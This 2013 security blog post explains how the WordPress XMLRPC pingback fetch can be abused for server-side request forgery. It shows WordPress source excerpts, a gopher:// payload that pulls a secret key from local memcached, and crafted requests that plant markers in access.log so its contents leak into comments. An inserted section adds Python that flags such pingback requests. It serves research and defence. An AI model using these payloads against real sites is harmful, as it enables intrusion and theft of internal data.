Friday, January 4, 2013

WordPress XMLRPC pingback additional issues

A vulnerability in the WordPress XMLRPC pingback function was recently published:

Basically, this vuln can be used to scan open ports on localhost and on the intranet:

But in fact, this vulnerability is much wider!

First, look at the "SSRF bible. Cheatsheet":
and our ZeroNights 0x02 presentation:

Let's try to exploit this bug as an SSRF!
By default WP tries to use cURL (libcurl) to make requests:

 4988       $linea = wp_remote_fopen( $pagelinkedfrom );

 749 function wp_remote_fopen( $uri ) {
 758         $response = wp_remote_get( $uri, $options );

 74 function wp_remote_get($url, $args = array()) {
 75         $objFetchSite = _wp_http_get_object();
 76         return $objFetchSite->get($url, $args);  ...
 22 function &_wp_http_get_object() {
 23         static $http;
 25         if ( is_null($http) )
 26                 $http = new WP_Http();

 294         function get($url, $args = array()) {
 295                 $defaults = array('method' => 'GET');
 296                 $r = wp_parse_args( $args, $defaults );
 297                 return $this->request($url, $r);
 298         }

 81         function request( $url, $args = array() ) {
 191                 return $this->_dispatch_request($url, $r);
 243         private function _dispatch_request( $url, $args ) {
 244                 static $transports = array();
 246                 $class = $this->_get_first_available_transport( $args, $url );
 205         public function _get_first_available_transport( $args, $url = null ) {
 206                 $request_order = array( 'curl', 'streams', 'fsockopen' );

Now you can see that support for file://, gopher://, dict://, ldap:// and other schemes makes this bug really dangerous.
Local services and host-based auth are easy to reach via dict/gopher.

Next, try to read data from the response. It may contain local file content (file://) or data from intranet hosts/services (http://wiki.internal.local, gopher://localhost:11211/1get%20secretkey%0aquit).
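A defender-side check for the pattern described above, added here as an example (not code from the original post or from WordPress): it parses an XML-RPC pingback.ping body and flags a sourceURI that uses a non-HTTP scheme or points at localhost/intranet hosts. The request bodies and host names are constructed samples; the check resolves no DNS, so it only recognises IP literals, localhost and .local/.internal names.

```python
import ipaddress
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit
from xml.sax.saxutils import escape

# Constructed sample: the XML-RPC body a pingback client sends. sourceURI is the
# caller-controlled value the post shows WordPress fetching with libcurl.
PINGBACK_TEMPLATE = (
    b'<?xml version="1.0"?><methodCall><methodName>pingback.ping</methodName>'
    b"<params><param><value><string>%s</string></value></param>"
    b"<param><value><string>http://blog.example/?p=1</string></value></param>"
    b"</params></methodCall>"
)

def build_pingback(source_uri: str) -> bytes:
    """Constructed request body carrying the given sourceURI (XML-escaped)."""
    return PINGBACK_TEMPLATE % escape(source_uri).encode()

def parse_pingback(body: bytes):
    """Return (sourceURI, targetURI) for a pingback.ping call, else None."""
    root = ET.fromstring(body)
    if root.tag != "methodCall" or root.findtext("methodName") != "pingback.ping":
        return None
    values = [s.text or "" for s in root.findall("./params/param/value/string")]
    return (values[0], values[1]) if len(values) == 2 else None

def is_internal_host(host: str) -> bool:
    """localhost, non-global IP literals (loopback, RFC1918, link-local) or
    .local/.internal names. Assumption: no DNS lookup, so it runs offline."""
    if host == "localhost":
        return True
    try:
        return not ipaddress.ip_address(host).is_global
    except ValueError:
        return host.endswith((".local", ".internal"))

def pingback_findings(body: bytes) -> list:
    """Findings for one XML-RPC body; an empty list means nothing was flagged."""
    parsed = parse_pingback(body)
    if parsed is None:
        return []
    url = urlsplit(parsed[0])
    scheme, host = url.scheme.lower(), url.hostname or ""
    findings = []
    if scheme not in ("http", "https"):    # file://, gopher://, dict://, ldap:// ...
        findings.append("scheme:" + scheme)
    if host and is_internal_host(host):    # localhost / intranet port scan, memcached
        findings.append("internal-host:" + host)
    return findings
```

Run it over the XML-RPC request bodies a WAF or reverse proxy sees before they reach xmlrpc.php; anything flagged is worth blocking or at least logging with the source IP.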

Look at WP code again:

 4988   $linea = wp_remote_fopen( $pagelinkedfrom );
 4989   if ( !$linea )
 4999   preg_match('|<title>([^<]*?)</title>|is', $linea, $matchtitle);
 5000   $title = $matchtitle[1];
 5001   if ( empty( $title ) )
 5002      return new IXR_Error(32, __('We cannot find a title on that page.'));
 5004   $linea = strip_tags( $linea, '<a>' ); // just keep the tag we need
 5006   $p = explode( "\n\n", $linea );
 5008   $preg_target = preg_quote($pagelinkedto, '|');
 5009   foreach ( $p as $para ) {
 5010      if ( strpos($para, $pagelinkedto) !== false ) { // it exists, but is it a link?
 5011         preg_match("|<a[^>]+?".$preg_target."[^>]*>([^>]+?)</a>|", $para, $context);
 5013         // If the URL isn't in a link context, keep looking
 5014         if ( empty($context) )
 5015            continue;


 5019         $excerpt = preg_replace('|\</?wpcontext\>|', '', $para);
 5021         // prevent really long link text
 5022         if ( strlen($context[1]) > 100 )
 5023            $context[1] = substr($context[1], 0, 100) . '...';

Data between the "<title>" and "</title>" strings is put in the author field of the comment (limited to 255 bytes by the DB field).
Data between the "<a >" and "</a>" strings is put in the content field of the comment (limited to 100 bytes by line 5022).

Now it is clear that you can read 355 bytes of arbitrary data.

Let's try to read data from access.log.
First, inject markers into access.log with requests like the following:
http://localhost/tests/wordpress/#<a http://localhost/tests/wordpress/?p=1>

Send the requests containing the markers as manually crafted HTTP packets like this (browsers create HTTP requests without the anchor part):
GET /tests/wordpress/#<a>marker1 HTTP/1.1
Host: localhost

Now you can add a comment with arbitrary data between your markers using a simple XMLRPC request (see slides 20-23 of our presentation about the ProcFS way to read access.log):

For fun, reading the output of the memcached stats command:

6 comments:

  1. WordPress pingback requires a back link to the origin post, and we cannot read info from resources where we cannot put this link.
    It's just a notice for other readers, because this is not written in the article. We cannot read /etc/passwd or similar files (only if they contain a link to the post, WTF).

    Research is interesting, thank you :)
